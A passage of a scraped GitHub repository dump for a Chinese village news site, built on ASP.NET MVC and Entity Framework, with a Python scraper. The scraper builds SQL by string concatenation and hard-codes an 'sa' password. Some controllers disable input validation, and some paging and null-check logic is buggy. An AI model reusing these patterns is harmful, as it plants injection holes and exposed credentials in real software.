ViewBag.Title = n.CaName;\n return View(n); \n }\n\n /// <summary>\n /// 先哲今贤\n /// </summary>\n /// <param name=\"bh\">12</param>\n /// <returns></returns>\n public ActionResult List(string bh,int pageindex=1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.News.Count(n=>n.bh == bh);\n if (total <1)\n {\n return Content(\"数据库中没有相关新闻\");\n }\n List<Model.News> list0 = dal.News.Where(n => n.bh == bh).OrderBy(n => n.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n \n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n return View(list);\n }\n\n\n /// <summary>\n /// 文化遗产保护\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult OnePage1(string bh, int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News n = dal.News.SingleOrDefault(x => x.ID == id && x.IsDeleted == true);\n if (n==null)\n {\n return Content(\"数据库中没有该新闻\");\n }\n ViewBag.Title = n.CaName;\n return View(n);\n }\n\n\n public ActionResult List1(string bh, int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.News.Count(n => n.bh == bh);\n if (total < 1)\n {\n return Content(\"数据库中没有相关新闻\");\n }\n List<Model.News> list0 = dal.News.Where(n => n.bh == bh).OrderBy(n => n.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n\n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n return View(list);\n }\n /// <summary>\n /// 走进孔坵\n /// </summary>\n /// <returns></returns>\n public ActionResult KQDetail()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n \n return View();\n }\n\n\n\n /// <summary>\n /// 孔坵全景\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_qj()\n {\n return View();\n }\n\n /// <summary>\n /// 山明水秀\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_sm()\n {\n return View();\n }\n\n /// <summary>\n /// 守望瑰宝\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_sw()\n {\n return View();\n }\n\n /// <summary>\n /// 曲径通幽\n /// </summary>\n /// <returns></returns>\n public ActionResult OnePage_qjty()\n {\n return View();\n }\n\n /// <summary>\n /// 众筹与活动(列表)\n /// </summary>\n /// <returns></returns>\n public ActionResult List_zc(string bh)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n List<Model.News> zc = dal.News.Where(x => x.bh == bh && x.IsDeleted == true).OrderByDescending(x=>x.CreateTime).Take(3).ToList<Model.News>();\n return View(zc);\n }\n\n /// <summary>\n /// 众筹活动(单页)\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult OnePage_zc(string bh, int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News zc = dal.News.SingleOrDefault(x => x.bh == bh & x.ID == id);\n if (zc==null)\n {\n return Content(\"数据库中没有该活动\");\n }\n ViewBag.Title=zc.Author;\n return View(zc);\n }\n\n /// <summary>\n /// 摄影比赛\n /// </summary>\n /// <returns></returns>\n public ActionResult photo_contest()\n {\n //DAL.GDKQContext dal = new DAL.GDKQContext();\n //List<Model.Photo> p = dal.Photo.OrderByDescending(x => x.CreateTime).Take(16).ToList<Model.Photo>();\n //if (p==null)\n //{\n // return Content(\"暂无比赛\");\n //}\n ViewBag.Title = \"摄影比赛\";\n return View();\n }\n\n\n public ActionResult join_contest()\n {\n return View();\n }\n }\n}" }, { "alpha_fraction": 0.4355832636356354, "alphanum_fraction": 0.43929606676101685, "avg_line_length": 31.610170364379883, "blob_id": "90b04fa0ec89965faf41bdc6f6c6ff92d495fc4c", "content_id": "cd7840bc3fd3bba30e462e2f38c4a5e880a4cd0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 14117, "license_type": "no_license", "max_line_length": 214, "num_lines": 413, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n [Filter.AdminLoginFilter]\n /// <summary>\n /// 新闻控制器\n /// </summary>\n public class NewsController : Controller\n {\n /// <summary>\n /// 单页新闻(读取)\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <returns></returns>\n public ActionResult OnePage(string bh)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Category ca = dal.Category.SingleOrDefault(a => a.bh == bh);\n if (ca == null)\n {\n return Content(\"没有该分类\");\n }\n Model.News n = dal.News.Single(a => a.bh == bh);\n if (n == null)\n {\n dal.News.Add(new Model.News()\n {\n Title = ca.CaName,\n Body = ca.CaName + \"的内容\",\n Author = null,\n bh = ca.bh,\n CaName = ca.CaName,\n CreateTime = DateTime.Now,\n VisitNum = 0,\n });\n dal.News.Add(n);\n }\n return View(n);\n }\n\n\n [ValidateAntiForgeryToken()]\n [HttpPost]\n [ValidateInput(false)]\n //单页新闻(编辑)\n public ActionResult OnePage(Model.News n)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News n_indb = dal.News.SingleOrDefault(a => a.ID == n.ID);\n if (n_indb == null)\n {\n return Json(new { status = \"n\", info = \"数据库中无该新闻\" });\n }\n n_indb.Title = n.Title;\n n_indb.Body = n.Body;\n n_indb.Url = n.Url;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"更新成功\" });\n }\n\n\n\n\n\n\n\n /// <summary>\n /// 列表新闻(读取)\n /// </summary>\n /// <param name=\"bh\">分类编号</param>\n /// <param name=\"pageindex\">当前所在页面编号</param>\n /// <returns></returns>\n public ActionResult List(string bh, int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n total = dal.News.Count(n => n.bh == bh && n.IsDeleted==true);\n if (total < 1)\n {\n return Content(\"数据库中没有相关新闻\");\n }\n List<Model.News> list0 = dal.News.Where(n => n.bh == bh && n.IsDeleted == true).OrderBy(\n n => n.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n ViewBag.Title = ca.CaName;\n ViewBag.bh = ca.bh;\n return View(list);\n }\n\n \n /// <summary>\n /// 列表新闻(添加)\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult Add(string bh, int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n #region\n Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n if (ca == null)\n {\n return Content(\"没有该分类\");\n }\n Model.News n = new Model.News();\n #endregion//验证是否有该新闻分类\n ViewBag.Title = ca.CaName;\n if (id == null)\n {\n //添加\n n = new Model.News()\n {\n VisitNum = 0,\n CaName = ca.CaName,\n bh = ca.bh,\n CreateTime = DateTime.Now\n };\n }\n else\n {\n //编辑\n n = dal.News.SingleOrDefault(a => a.ID == id);\n if (n == null)\n {\n return Content(\"数据库中不存在该新闻\");\n }\n }\n return View(n);\n }\n\n [ValidateAntiForgeryToken()]\n [HttpPost]\n [ValidateInput(false)]\n public ActionResult Add(Model.News n)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n if (n.ID == 0)\n {\n //添加\n dal.News.Add(new Model.News()\n {\n Author = n.Author,\n bh = n.bh,\n Body = n.Body,\n CaName = n.CaName,\n CreateTime = DateTime.Now,\n IsDeleted = true,\n Photo = n.Photo,\n Title = n.Title,\n VisitNum = 1,\n Url= \"https://\"+n.Url\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"添加成功\" ,bh=n.bh});\n }\n else\n {\n //编辑\n Model.News n_indbb = dal.News.SingleOrDefault(a => a.ID == n.ID);\n if (n_indbb == null)\n {\n return Json(new { status = \"n\", info = \"数据库中无该新闻\" });\n }\n n_indbb.Title = n.Title;\n n_indbb.Body = n.Body;\n n_indbb.Photo = n.Photo;\n n_indbb.Author = n.Author;\n n_indbb.Url = n.Url;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"编辑成功\",bh=n.bh });\n }\n }\n\n\n public ActionResult Delect(string bh,int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News n = dal.News.SingleOrDefault(x => x.ID == id);\n if (n==null)\n {\n return Content(\"没有该新闻\");\n }\n n.IsDeleted = false;\n dal.SaveChanges();\n return Redirect(\"/Adm1n/News/List?bh=\"+bh);\n }\n\n #region\n /// <summary>\n /// 建议列表\n /// </summary>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public ActionResult AdviceList(int pageindex=1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Advice.Count();\n if (total < 1)\n {\n return Content(\"暂无建议\");\n }\n List<Model.Advice> list0 = dal.Advice.Where(x=>x.IsRead==true).OrderByDescending(ad=>ad.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Advice>();\n PagedList<GDKQ.Model.Advice> list = new PagedList<Model.Advice>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"建议箱\";\n return View(list);\n }\n\n /// <summary>\n /// 删除建议\n /// </summary>\n /// <returns></returns>\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult DelectAdvice(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Advice ad = dal.Advice.SingleOrDefault(x => x.ID == id);\n if (ad == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有相关数据\" });\n }\n ad.IsRead = false;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"删除成功\" });\n }\n #endregion\n //↑查看建议与删除\n\n\n\n /// <summary>\n /// 所有文章(列表)\n /// </summary>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public ActionResult ShowArticle(int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Article.Count(x => x.IsDeleted == true && x.Enable == true);\n if (total<1)\n {\n return Content(\"暂无文章\");\n }\n List<Model.Article> list0 = dal.Article.Where(x => x.IsDeleted == true && x.Enable == true).OrderByDescending(x => x.CreateTime).Skip((pageindex - 1) * pageindex).Take(pagesize).ToList<Model.Article>();\n PagedList<Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"所有文章\";\n return View(list);\n }\n /// <summary>\n /// 列表新闻(添加)\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult AddArticle( int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n #region\n Model.UA_Category ca = dal.UA_Category.SingleOrDefault(x => x.bh == \"04\");\n if (ca == null)\n {\n return Content(\"没有该分类\");\n }\n Model.Article art = new Model.Article();\n #endregion//验证是否有该文章分类\n ViewBag.Title = ca.CaName;\n if (id == null)\n {\n //添加\n art = new Model.Article()\n {\n AuthorID = 999,\n AuthorName = \"管理员\",\n CaName = ca.CaName,\n CategoryID = ca.bh,\n lab = null,\n };\n }\n else\n {\n //编辑\n art = dal.Article.SingleOrDefault(a => a.ID == id);\n if (art == null)\n {\n return Content(\"数据库中不存在该新闻\");\n }\n }\n return View(art);\n }\n\n [ValidateAntiForgeryToken()]\n [HttpPost]\n [ValidateInput(false)]\n public ActionResult AddArticle(Model.Article art)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n if (art.ID == 0)\n {\n //添加\n dal.Article.Add(new Model.Article()\n {\n AuthorID = 999,\n Body=art.Body,\n Title=art.Title,\n CaName=art.CaName,\n CategoryID=art.CategoryID,\n AuthorName=\"管理员\",\n lab=art.lab\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"添加成功\"});\n }\n else\n {\n //编辑\n Model.Article art_indbb = dal.Article.SingleOrDefault(a => a.ID == art.ID);\n if (art_indbb == null)\n {\n return Json(new { status = \"n\", info = \"数据库中无该新闻\" });\n }\n art_indbb.Title = art.Title;\n art_indbb.Body = art.Body;\n art_indbb.AuthorName = art.AuthorName;\n art_indbb.AuthorID = 999;\n art_indbb.CaName = art.CaName;\n art_indbb.CategoryID = art.CategoryID;\n art_indbb.lab = art.lab;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"编辑成功\" });\n }\n }\n\n\n\n /// <summary>\n /// 文章审核\n /// </summary>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public ActionResult ExmArticle(int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Article.Count(x=>x.Enable==false);\n if (total < 1)\n {\n return Content(\"暂无待审核文章\");\n }\n List<Model.Article> list0 = dal.Article.Where(x => x.Enable == false&&x.IsDeleted==true).OrderByDescending(ad \n => ad.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n PagedList<GDKQ.Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"文章审核\";\n return View(list);\n }\n\n\n /// <summary>\n /// 审核通过\n /// </summary>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Pass(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID==id);\n if (art==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有相关数据\" });\n }\n art.Enable = true;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"审核通过\" });\n }\n\n /// <summary>\n /// 审核不通过(软删除)\n /// </summary>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Delect(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n if (art == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有相关数据\" });\n }\n art.IsDeleted = false;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"删除成功\" });\n }\n\n\n }\n}" }, { "alpha_fraction": 0.5997409224510193, "alphanum_fraction": 0.606217622756958, "avg_line_length": 22.393939971923828, "blob_id": "611535a6459d4151d61905abfc4bd169ada1530e", "content_id": "ab293e36597c222362841aab5af7bda1285d80f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 772, "license_type": "no_license", "max_line_length": 55, "num_lines": 33, "path": "/GDKQ.Model/UserInfo.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"UserInfo\")]\n public partial class UserInfo\n {\n public int ID { get; set; }\n\n public int? UserID { get; set; }\n\n [StringLength(32)]\n public string Nickname { get; set; }\n\n public string Hobby { get; set; }\n\n [StringLength(8)]\n public string Gender { get; set; }\n\n public string Description { get; set; }\n\n public string Photo { get; set; }\n\n [StringLength(32)]\n public string RealName { get; set; }\n\n public virtual User User { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.6280373930931091, "alphanum_fraction": 0.6317756772041321, "avg_line_length": 22.2608699798584, "blob_id": "865b005a48e730ab766f5e825b9c10d34ac4e335", "content_id": "0d2be2e967663b55a6407841ac54c58656837aa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 535, "license_type": "no_license", "max_line_length": 55, "num_lines": 23, "path": "/GDKQ.Model/Advice.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Advice\")]\n public partial class Advice\n {\n public int ID { get; set; }\n\n public string Body { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public bool IsRead { get; set; }\n\n [StringLength(64)]\n public string From_Name { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.6679104566574097, "alphanum_fraction": 0.6679104566574097, "avg_line_length": 24.5238094329834, "blob_id": "67ce264428b17ede5d243bfb0a720a3a34e9dcec", "content_id": "a6a199ce3e680dd90fa1db083a87261061e4ed6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 536, "license_type": "no_license", "max_line_length": 57, "num_lines": 21, "path": "/GDKQ.Model/Attribute.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Attribute\")]\n public partial class Attribute\n {\n [DatabaseGenerated(DatabaseGeneratedOption.None)]\n public int ID { get; set; }\n\n public string Address { get; set; }\n\n public string WeChat_Subscription { get; set; }\n\n public string Email { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.571265697479248, "alphanum_fraction": 0.5781071782112122, "avg_line_length": 21.487178802490234, "blob_id": "9a99e42f0b81ade36448da917b0158de98fbe4a6", "content_id": "d7f3ecf05e9ee36dc6e7146b11919853f1bda704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 877, "license_type": "no_license", "max_line_length": 55, "num_lines": 39, "path": "/GDKQ.Model/Mail.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Mail\")]\n public partial class Mail\n {\n public int ID { get; set; }\n\n public int To_UID { get; set; }\n\n public int From_UID { get; set; }\n\n [Required]\n public string Body { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public bool IsRead { get; set; }\n\n public bool IsDelect { get; set; }\n\n [Required]\n [StringLength(64)]\n public string Title { get; set; }\n\n [Required]\n [StringLength(64)]\n public string To_Name { get; set; }\n\n [Required]\n [StringLength(64)]\n public string From_Name { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.5970436930656433, "alphanum_fraction": 0.5970436930656433, "avg_line_length": 35.1860466003418, "blob_id": "36d1e684e8b1ea6601edaa3993c0cb8cb5cba094", "content_id": "88a883959de882735a3495203118b9b8e90e7c91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1556, "license_type": "no_license", "max_line_length": 76, "num_lines": 43, "path": "/GDKQ.DAL/GDKQContext.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.DAL\n{\n using System;\n using System.Data.Entity;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Linq;\n using Model;\n\n public partial class GDKQContext : DbContext\n {\n public GDKQContext()\n : base(\"name=GDKQContext\")\n {\n }\n\n public virtual DbSet<Admin> Admin { get; set; }\n public virtual DbSet<Advice> Advice { get; set; }\n public virtual DbSet<Article> Article { get; set; }\n public virtual DbSet<Model.Attribute> Attribute { get; set; }\n public virtual DbSet<Category> Category { get; set; }\n public virtual DbSet<Comment> Comment { get; set; }\n public virtual DbSet<Mail> Mail { get; set; }\n public virtual DbSet<News> News { get; set; }\n public virtual DbSet<Photo> Photo { get; set; }\n public virtual DbSet<UA_Category> UA_Category { get; set; }\n public virtual DbSet<User> User { get; set; }\n public virtual DbSet<UserInfo> UserInfo { get; set; }\n public virtual DbSet<Villager> Villager { get; set; }\n public virtual DbSet<Vote_Main> Vote_Main { get; set; }\n public virtual DbSet<Vote_Result> Vote_Result { get; set; }\n\n protected override void OnModelCreating(DbModelBuilder modelBuilder)\n {\n modelBuilder.Entity<Photo>()\n .Property(e => e.author)\n .IsFixedLength();\n\n modelBuilder.Entity<Photo>()\n .Property(e => e.place)\n .IsFixedLength();\n }\n }\n}\n" }, { "alpha_fraction": 0.517401397228241, "alphanum_fraction": 0.547099769115448, "avg_line_length": 36.17241287231445, "blob_id": "9d16475684b7bfb7db955c4f5d9cd8e85b515a25", "content_id": "23d44ffb94727aefa1051000cc7bdeea534ea2c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2223, "license_type": "no_license", "max_line_length": 148, "num_lines": 58, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n public class HomeController : Controller\n {\n public class viewModel\n {\n public List<Model.News> news001 { get; set; }//公示公告\n public List<Model.News> news002 { get; set; }//建设农村\n public List<Model.News> news003 { get; set; }//村内事务\n public List<Model.News> news007 { get; set; }//时事要点\n\n public viewModel(List<Model.News> newsList001, List<Model.News> newsList002, List<Model.News> newsList003, List<Model.News> newsList007)\n {\n this.news001 = newsList001;\n this.news002 = newsList002;\n this.news003 = newsList003;\n this.news007 = newsList007;\n\n }\n }\n // 村务首页\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n var vm = new viewModel(\n dal.News.Where(x => x.bh == \"001\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(3).ToList<Model.News>(),\n dal.News.Where(x => x.bh == \"002\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(3).ToList<Model.News>(),\n dal.News.Where(x => x.bh == \"003\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(5).ToList<Model.News>(),\n dal.News.Where(x => x.bh == \"007\" && x.IsDeleted == true).OrderByDescending(x => x.CreateTime).Take(8).ToList<Model.News>()\n );\n return View(vm);\n }\n\n\n [HttpPost]\n public ActionResult AddLike(int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article a = dal.Article.SingleOrDefault(x => x.ID == id);\n if (a == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n a.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n\n\n }\n}" }, { "alpha_fraction": 0.5725893974304199, "alphanum_fraction": 0.6186348795890808, "avg_line_length": 35.19607925415039, "blob_id": "c569a1f5ab9c80ad13cbf37529c6c3499c2e8e3a", "content_id": "fbe506822ae849fa9511c8256dc21af1bf34561f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1856, "license_type": "no_license", "max_line_length": 168, "num_lines": 51, "path": "/GDKQ.Web/Content/Admin/PythonApplication/Daxuesheng.py", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "WINDOWS-1252", "text": "#coding=gbk\nimport requests\nimport pyodbc\nfrom bs4 import BeautifulSoup\nurl='http://zhannei.baidu.com/cse/search?q=%E5%AD%94%E5%9D%B5%E6%9D%91&p=0&s=10871809385446352931&entry=1'\nurl2='http://zhannei.baidu.com/cse/search?q=%E5%AD%94%E5%9D%B5%E6%9D%91&p=1&s=10871809385446352931&entry=1'\ndef fun(testurl):\n headers = {'user-agent': 'my-app/0.0.1'}\n res=requests.get(testurl,headers=headers)\n res.encoding='utf-8'\n soup=BeautifulSoup(res.text,'html.parser')\n\n cnxn =pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=GDKQ_DB;UID=sa;PWD=123456')\n cursor = cnxn.cursor()\n\n\n for i in soup.select('#results')[0].find_all(\"a\"):\n res2 = requests.get(i.get(\"href\"))\n print('ÎÄÕÂÁ´½Ó£º'+i.get(\"href\"))\n\n\n\n\n res2.encoding = 'utf-8'\n soup2 = BeautifulSoup(res2.text, 'html.parser')\n # print(soup.select('.title'))\n Title=soup2.select('.title')[0].h1.text.strip()\n ExctraMess=soup2.select('.title')[0].span.text.strip()\n \n\n\n TurlBody=''\n for j in soup2.select('.content')[0].find_all(\"p\"):\n TurlBody=TurlBody+j.text.strip()\n #print(TurlBody)\n #tempstring='insert into dbo.Py_Spider(Title, Body) values (%s,%s)'\n #tempstring.format(Title,TurlBody)\n #\n sadf=\"insert into dbo.Py_Spider(Title, Body) values (\"+\"'\"+Title+\"'\"+\",\"+\"'\"+TurlBody+\"'\"+\")\"\n #print(sadf)\n cursor.execute(sadf)\n cnxn.commit()\n #cursor.execute(\"insert into dbo.Py_Spider(Title, Body,Creattime,IsDelect,Enable,remark) values (%s,%s,%s,%s,%s,%s)\",'Title','TurlBody','null',True,True,'null')\n #cnxn.commit()\n\n #cursor.execute(\"insert into dbo.Py_Spider(Title, Body) values ('Title', 'TurlBody')\")\n #cnxn.commit()\n #print(tempstring)\n #print(i.get(\"href\"),i.text)\nfun(url)\nfun(url2)\n" }, { "alpha_fraction": 0.8157894611358643, "alphanum_fraction": 0.8157894611358643, "avg_line_length": 18, "blob_id": "6762547dd729b5fb47132d0c91da1cf22d9d23db", "content_id": "f35021521eaa14b4bb91c2c3228272a5c51d10d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 38, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/README.md", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "# BeautifulCountryside\nbase on MVC+EF\n" }, { "alpha_fraction": 0.5671392679214478, "alphanum_fraction": 0.5738115310668945, "avg_line_length": 21.62264060974121, "blob_id": "e4a6ad3443fcf1181394a1763f1d77b0375c76a9", "content_id": "6bfffb8cd683b9fef18956b68181c10279e922b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 55, "num_lines": 53, "path": "/GDKQ.Model/Article.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Article\")]\n public partial class Article\n {\n public int ID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string Title { get; set; }\n\n [Required]\n public string Body { get; set; }\n\n public int AuthorID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string CategoryID { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n public int VisitNum { get; set; }\n\n public string Photo { get; set; }\n\n public bool IsDeleted { get; set; }\n\n public DateTime ModTime { get; set; }\n\n [Required]\n public string lab { get; set; }\n\n [Required]\n [StringLength(64)]\n public string CaName { get; set; }\n\n [StringLength(32)]\n public string AuthorName { get; set; }\n\n public int like_count { get; set; }\n\n public int Comments { get; set; }\n\n public bool Enable { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.8533333539962769, "alphanum_fraction": 0.8533333539962769, "avg_line_length": 37, "blob_id": "62688d9bb429f2e6df7332b9a8cce9842531a77f", "content_id": "afb6b725b618f89ed76cbe41111092409c0be82c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 175, "license_type": "no_license", "max_line_length": 43, "num_lines": 2, "path": "/Python爬虫文件/ReadMe.txt", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "GB18030", "text": "Daxuesheng.py 主要从大学生新闻网摘取关键词\"孔坵村\",存入论坛数据库中。\nmain.py 主要从台州政府网摘取关键词,存入村务数据库中。" }, { "alpha_fraction": 0.4976958632469177, "alphanum_fraction": 0.5069124698638916, "avg_line_length": 25.079999923706055, "blob_id": "272450cc18a647c0cc85287b3f507312b260e79b", "content_id": "f8e14995b562155458ed491843efda4578b5c199", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 653, "license_type": "no_license", "max_line_length": 88, "num_lines": 25, "path": "/GDKQ.Web/Areas/Adm1n/Adm1nAreaRegistration.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n\n{\n public class Adm1nAreaRegistration : AreaRegistration \n {\n public override string AreaName \n {\n get \n {\n return \"Adm1n\";\n }\n }\n\n public override void RegisterArea(AreaRegistrationContext context) \n {\n context.MapRoute(\n \"Adm1n_default\",\n \"Adm1n/{controller}/{action}/{id}\",\n new { controller=\"Home\", action = \"Index\", id = UrlParameter.Optional },\n new string[] { \"GDKQ.Web.Areas.Adm1n.Controllers\" }\n );\n }\n }\n}" }, { "alpha_fraction": 0.5098510384559631, "alphanum_fraction": 0.5218644738197327, "avg_line_length": 34.28813552856445, "blob_id": "f526f2e8641f1c1c9ff24730d2308669bd8ba41e", "content_id": "bf10e720ea3ddb586f6855f43e92d5130a89cc60", "detected_licenses": [], 